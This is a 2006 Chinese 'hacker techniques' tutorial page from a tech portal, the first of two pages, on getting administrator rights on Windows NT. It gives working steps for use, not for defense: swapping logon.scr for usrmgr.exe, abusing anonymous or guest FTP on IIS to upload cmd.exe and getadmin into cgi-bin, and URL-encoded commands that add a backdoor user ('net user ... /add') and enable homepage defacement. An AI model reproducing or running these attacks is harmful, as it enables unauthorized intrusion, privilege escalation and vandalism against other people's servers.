|
|
域名空间 下载中心 社区论坛 信息公告 my小屋 | |
 |
联系我们 设为首页 加入收藏 |
 |
|
 |
首页 | 新闻资讯 | 编程开发 | 网页设计 | 图形图象 | 网络媒体 | 网站模板 | 数 据 库 | 投稿 论坛 | 操作系统 | 系统优化 | 网络安全 | 黑客技术 | 硬件学堂 | 硬件报价 | 服 务 器 | 地图 专题 | 应用软件 | 聊天通讯 | q q 专栏 | 建站经验 | 在线工具 | 站长club | 注 册 表 | 旧版 社会 | 游戏娱乐 | 设计欣赏 | 疑难解答 | 社区论坛 | 韩国素材 | 素材图库 | 广告服务 | 服务 |
 |
 |
 |
 当前位置:首页>>网络安全>>黑客技术>>正文 |
新版上线![旧版] |  |
|||
注:打开慢时请稍等
nt下获得admin权限的四种方法http://www.iyit.net 日期:2006-10-23 19:42:26 来源: 点击: |
如果你有普通用户帐号,有个一个很简单的方法获取nt administrator帐号: 先把c:winntsystem32下的logon.scr改名为logon.old备份然后把usrmgr.exe改名为logon.scr 然后重新启动 logon.scr是启动时加载的程序,重新启动后,不会出现以往的登陆密码输入界面,而是用户管理器这时他就有权限把自己加到administrator组 不要忘记把文件名改回来啊! 技巧之二: 下面的技术适用于不重视nt网络安全的网站,虽然要靠运气,但是人多力量大 一些 http的技术也可以供较高级的人员参考 作为初学者,进入nt网络可以采取下面的步骤: 因为nt的iis server的ftp一般都是允许anonymous匿名帐号进入的,有些anonymous的帐号还有upload权限,我们就要攻击这类站点。因为如果不允许匿名帐号,就可能造成明文密码在网上传输。用tcpspy的工具可以截获这些密码。现在不谈这些比较高级的技术。 正因为允许匿名帐号ftp登陆的设定,也给我们带来了突破nt server的机会。我们用ftp登陆一个nt server,比如:www.xxx.com(示例名): ftp www.xxx.com connected to www.xxx.com 220 ntsvr2 microsoft ftp service (version 3.0). ntsvr2这个东西暴露了其netbios名,那么在iis的背景下,必然会有一个iuser_ntsvr2的用户帐号,属于domain user组,这个帐号我们以后要用来获取administrator的权限 user (www.xxx.com:(none)):anonymous 331 anonymous access allowed, send identity (e-mail name) as password. password: 输入 guest@ 或者guest 对于缺乏网络安全知识的管理员来说,很多人没有将guest帐号禁止,或者没有设置密码。 那么guest帐号就是一个可用的正确的用户帐号,虽然只属于domain guest组 在这种情况下我们就可以进nt server的ftp了。 进去以后,试试 cd /c ,如果运气好,改变目录成功,这时你就有了80%的把握。 现在,开始查找cgi-bin目录(或者scripts目录),进去以后, 把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll传上去到cgi-bin 然后输入:http://www.xxx.com/cgi-bin/getadmin.exe?iusr_saturn 大约十多秒后屏幕显示: cgi error 这时有90%的可能是:你已经把iuser_ntsvr2升级为administrator,也就是任何访问该web站的人都是管理员 下面可以add user: http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:winntsystem32net.exe%20user%20china%20news%20/add 这样就创建了一个叫china用户,密码是news,然后: http://www.xxx.com/cgi-bin/getadmin.exe?cnn 你再用cnn的帐号登陆,就可以改web根目录的主页了,也可以用上面的cmd.exe的方法直接修改 windows中共享网络打印机的技巧 轻松学做qq聊天自定义表情 本新闻共2页,当前在第1页 1 2 编辑: [发送给好友] [打印本页] [关闭窗口] [返回顶部] 上一篇:nt下使用匿名获得admin权限 下一篇:顶尖高手写的alexa作弊完全揭秘 转载请注明来源:www.iyit.net 特别声明: 本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。 |
| 相关文章 | ||||||||
|
 |
设置首 页 - 版权声明 - 广告服务 - 关于我们 - 联系我们 - 友情连接 |  |
| |||||||
易特网络技术